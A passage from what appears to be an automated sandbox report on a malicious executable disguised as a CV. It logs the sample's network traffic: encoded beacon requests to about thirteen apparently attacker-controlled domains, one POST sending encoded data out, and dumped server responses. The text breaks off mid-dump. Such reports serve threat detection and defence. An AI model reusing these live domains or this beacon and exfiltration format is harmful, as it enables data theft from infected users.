                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003D4EB5
                Source: global trafficHTTP traffic detected: GET /wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtCvBZNCCQMFI+vTFboLP2ZRmMaANZD1baSXk=&etx=BXy4elO0X HTTP/1.1Host: www.grandesofertas.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z9pi/?3vNdCBvX=ied+cptg7UakpzhOx9uXTlAGHDuhbT7ej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipvFkLuNeVdA8j2seJJxWGnVEyQ8hCuTv0uPE=&etx=BXy4elO0X HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8qt7/?3vNdCBvX=FpCuTMU+yGtduI5SdGSwoaTqY2YvqsELSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXjJlaW2N0MrSdIjCq1nBCaRQTsV/7KTtyEyY=&etx=BXy4elO0X HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mlxg/?3vNdCBvX=cQzZIkxePH03UbtTShzK+VL4o2HqQJS38l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrbeJFZzqSBCnp1w20sGwly8q3n1+yWGeN50w=&etx=BXy4elO0X HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dash/?etx=BXy4elO0X&3vNdCBvX=YMHBudoHIUxH+uWIVKjvQ5iF9tPwkJokcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q0LUsa6Gef/JbuNbn4M13wkoCvJOzh8OnTqA= HTTP/1.1Host: www.fortevision.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mv7p/?3vNdCBvX=5Xkb80UCbQYKeySKU05ZgY0hyXkWVD4R8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOGKEDCrVhSay3c3WH5ydFiaohW8mA4vlt7iA=&etx=BXy4elO0X HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cm9a/?etx=BXy4elO0X&3vNdCBvX=AvN42DnS9Qw3kn1S+XKBV+xTI9DBYK88wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvqBbKt/3mV1eMDkmtL8V6ExRSF03F7PAG84A= HTTP/1.1Host: www.prhmcjdz.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6urf/?3vNdCBvX=l+g0G83zvX30P9FiLKUhk1gZnSMwjxKGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR6e8+1gk4cvE7j0i5NK3NPPZTmYTXI7istro=&etx=BXy4elO0X HTTP/1.1Host: www.connecty.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cpgr/?3vNdCBvX=yUPZw4O96lKRgUDhHw42lX6F/Rxn05lUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjFijspiVTtXDCDHBic1mdKVGnCgRAN7vlfYA=&etx=BXy4elO0X HTTP/1.1Host: www.tals.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /u9hy/?3vNdCBvX=WqQro+xdjTeJIlGwaHeXAa2bD6tPyTI49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxIpJrNQCfkQktXm0b+9FyofxiDukpHyXFoA4=&etx=BXy4elO0X HTTP/1.1Host: www.50food.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /f8c6/?3vNdCBvX=qZLxeIvUMpnHejM+2fTaZNrv2WO4y9kWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgsy7m2PREgKHVMtzZClnOVsBz8/E/4iFHS34=&etx=BXy4elO0X HTTP/1.1Host: www.zriaraem-skiry.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gb2h/?3vNdCBvX=EASy0dFQ3+mIcpYj5hhEpzGwaoMP7Xj9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXHLAts09AmDfBZWK+en/xOBIa/+jQwvZyXLY=&etx=BXy4elO0X HTTP/1.1Host: www.nmgzjwh.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gdvz/?3vNdCBvX=42oDQZKHBS2RpvFPN57q1Tvu2doBJ10tXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OicxtKtIH3MbSxhASop5ADKNulvt1+Wm0v0/w=&etx=BXy4elO0X HTTP/1.1Host: www.sklad-iq.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.fortevision.xyz
                Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                Source: global trafficDNS traffic detected: DNS query: www.prhmcjdz.tokyo
                Source: global trafficDNS traffic detected: DNS query: www.connecty.live
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.50food.com
                Source: global trafficDNS traffic detected: DNS query: www.zriaraem-skiry.sbs
                Source: global trafficDNS traffic detected: DNS query: www.nmgzjwh.net
                Source: global trafficDNS traffic detected: DNS query: www.sklad-iq.online
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: unknownHTTP traffic detected: POST /z9pi/ HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.jijievo.siteReferer: http://www.jijievo.site/z9pi/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 205User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36Data Raw: 33 76 4e 64 43 42 76 58 3d 76 63 31 65 66 5a 42 79 79 30 2f 47 72 68 6b 42 67 61 47 34 56 69 67 46 54 47 62 34 4d 44 66 62 6c 4c 51 31 58 4c 62 41 31 42 64 30 75 67 74 72 49 37 45 34 53 78 6b 69 44 50 79 73 6c 6c 2f 4c 43 75 54 72 73 6d 43 51 66 52 78 6a 35 4f 54 74 46 2b 66 30 69 41 55 6b 6f 2f 48 7a 63 52 4a 6a 33 49 4f 62 4d 53 7a 59 6c 45 34 46 57 2b 67 48 67 77 33 63 68 50 43 6d 48 52 53 6d 32 77 68 34 4b 48 30 72 64 6e 49 69 76 6c 2b 34 55 2b 33 70 31 73 71 6d 66 35 77 6d 4e 63 76 57 36 4e 64 61 64 30 42 77 37 65 79 68 4c 48 58 78 32 76 54 77 41 37 47 6a 32 61 37 57 56 6f 48 44 6f 70 46 42 38 67 3d 3d Data Ascii: 3vNdCBvX=vc1efZByy0/GrhkBgaG4VigFTGb4MDfblLQ1XLbA1Bd0ugtrI7E4SxkiDPysll/LCuTrsmCQfRxj5OTtF+f0iAUko/HzcRJj3IObMSzYlE4FW+gHgw3chPCmHRSm2wh4KH0rdnIivl+4U+3p1sqmf5wmNcvW6Ndad0Bw7eyhLHXx2vTwA7Gj2a7WVoHDopFB8g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:10:24 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:10:27 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:10:29 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:10:32 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:10:40 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:10:43 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 